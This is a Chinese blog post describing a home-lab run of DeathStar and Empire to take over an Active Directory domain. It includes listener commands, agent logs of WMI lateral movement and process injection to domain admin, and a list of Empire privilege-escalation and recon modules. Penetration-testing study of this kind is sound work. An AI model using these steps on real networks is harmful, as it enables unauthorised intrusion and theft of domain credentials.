横向移动之用DeathStar和Empire全自动域渗透[坑]

DeathStar is a Python script that uses Empire's RESTful API to automate gaining Domain Admin rights in Active Directory environments using a variety of techinques. https://github.com/byt3bl33d3r/DeathStar

环境介绍

  • web服务——windows 2008 r2——192.168.138.141
  • 客户端——windows 2003 r2——192.168.138.128
  • 域控——windows 2008 r2——192.168.138.140
  • 攻击——kali,安装了empireDeathStar

新建一个普通域用户test,登陆到
注意: 需要手动修改empire框架中的监听器DeathStar,重启监听器以便让新配置生效

(Empire: listeners) > edit DeathStar Host http://192.168.138.136:8080
(Empire: listeners) > edit DeathStar Port 8080
(Empire: listeners) > disable DeathStar
(Empire: listeners) > enable DeathStar

开始

DeathStar通过restempire连接,当empire有一个agent回连之后,DeathStar就开始工作了。

然而因为测试环境中出现的超长用户名,导致DeathStar出错,简单处理下异常代码就可以接着跑了(图略)。

注意:因为普通的域用户权限很低,无法进行凭据读取的操作,第一次失败了。

于是将域用户test加入到windows2003和windows2008的本机管理员组,再执行一遍。

在window2003(192.168.138.128)上获取域环境信息,并尝试获取本机已有的凭据。

[+] New Agent => Name: MTLV2E6X IP: 192.168.138.128 HostName: WIN2003 UserName: PENTEST\test HighIntegrity: 1
[*] Agent: MTLV2E6X => Starting recon
[+] Agent: MTLV2E6X => Got domain SID: S-1-5-21-3356271140-971267009-3247355629
[+] Agent: MTLV2E6X => Found 1 members of the Domain Admins group: ['PENTEST\\Administrator']
[+] Agent: MTLV2E6X => Found 1 Domain Controllers: ['dc.pentest.com']
[+] Agent: MTLV2E6X => Found 0 active admin sessions: []
[+] Agent: MTLV2E6X => Found 4 users logged into localhost: ['WIN2003\\web1545978444188', 'WIN2003\\web1545980367000', 'WIN2003\\web1545978429531', 'PENTEST\\test']
[*] Agent: MTLV2E6X => Starting lateral movement
[*] Agent: MTLV2E6X => Starting domain privesc
[+] Agent: MTLV2E6X => Enumerated 1 processes
[*] Agent: MTLV2E6X => Spawning new Agent using CredID 6
[*] Agent: MTLV2E6X => Spawning new Agent using CredID 7
[+] Agent: MTLV2E6X => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] Agent: MTLV2E6X => Current security context has admin access to 2 hosts

利用wmi横移到windows2008(192.168.138.141)上面。发现并注入到域管理员运行的进程。

[DEBUG] Agent: MTLV2E6X => Executed Module => success: True taskID: 11 msg: 'tasked agent MTLV2E6X to run module powershell/lateral_movement/invoke_wmi'
[+] New Agent => Name: 24REVLAS IP: 192.168.138.141 HostName: WEB UserName: PENTEST\test HighIntegrity: 1
[+] Agent: 24REVLAS => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
[+] Agent: 24REVLAS => Found Domain Admin logged in: PENTEST\Administrator
[*] Agent: 24REVLAS => Starting domain privesc
[+] Agent: 24REVLAS => Enumerated 1 processes
[*] Agent: 24REVLAS => Found process 1644 running under PENTEST\administrator
[*] Agent: 24REVLAS => PSInjecting into process 1644

注入成功之后产生一个新的agent,为域管理员权限,可以进入3台主机

[+] Agent: 24REVLAS => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] New Agent => Name: 5F2CHEDZ IP: 192.168.138.141 HostName: WEB UserName: PENTEST\administrator HighIntegrity: 1
[+] Agent: 5F2CHEDZ => Found 2 users logged into localhost: ['PENTEST\\Administrator', 'WEB\\mysql']
[+] Agent: 5F2CHEDZ => Found Domain Admin logged in: PENTEST\Administrator
[*] Agent: 5F2CHEDZ => Starting lateral movement
[*] Agent: 5F2CHEDZ => Starting domain privesc
[+] Agent: 5F2CHEDZ => Enumerated 1 processes
[+] Agent: 5F2CHEDZ => Found 0 GPO(s) containing credentials using GPP SYSVOL privesc
[+] Agent: 5F2CHEDZ => Current security context has admin access to 3 hosts

成功登陆域控服务器

[+] New Agent => Name: WY9A1DC7 IP: 192.168.138.140 HostName: DC UserName: PENTEST\Administrator HighIntegrity: 1

[+] Agent: WY9A1DC7 => Got Domain Admin via security context - agent using domain admin account in high integrity process!

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

获取的agent,有先后顺序

换个方式横移——GPO

组策略的所有配置信息都存放在GPO(Group Policy Object,组策略对象)中,组策略被视为Active Directory中的一种特殊对象,可以将GPO和活动目录的容器(站点、域和OU)连接起来,以影响容器中的用户和计算机。组策略是通过组策略对象来进行管理的。

统一设置了每台服务器的本机管理员(uid500)的密码,并将域用户test从本机管理员组踢出。
empire关闭所有agentcreds remove all清除已保存的凭据。
因为进程注入需要一个存活的域用户进程,而windows2003没法快速切换用户,所以这次从windows2008开始漫游。

可惜的是因为empire的问题漫游终止了。

查看agent的job,这里获取的是域策略设置的本机管理员密码,而域里面的每台主机不一定会执行这个策略,所以需要一个empire模块get_gpo_computer.py来获取执行了策略的主机,查看哪些主机是域管理员登陆过的,再横移过去。

总结

可以查看DeathStar里面的代码,依次执行了什么empire的哪些模块,再单独手工操练。

  1. powershell/management/get_domain_sid
  2. powershell/situational_awareness/network/powerview/get_group_member
  3. powershell/situational_awareness/network/powerview/get_domain_controller
  4. powershell/situational_awareness/network/powerview/user_hunter
  5. powershell/situational_awareness/network/powerview/get_loggedon
  6. powershell/privesc/gpp
  7. powershell/privesc/bypassuac_eventvwr
  8. powershell/situational_awareness/network/powerview/find_localadmin_access
    等等
最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,504评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,434评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 160,089评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,378评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,472评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,506评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,519评论 3 413
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,292评论 0 270
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,738评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,022评论 2 329
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,194评论 1 342
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,873评论 5 338
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,536评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,162评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,413评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,075评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,080评论 2 352

推荐阅读更多精彩内容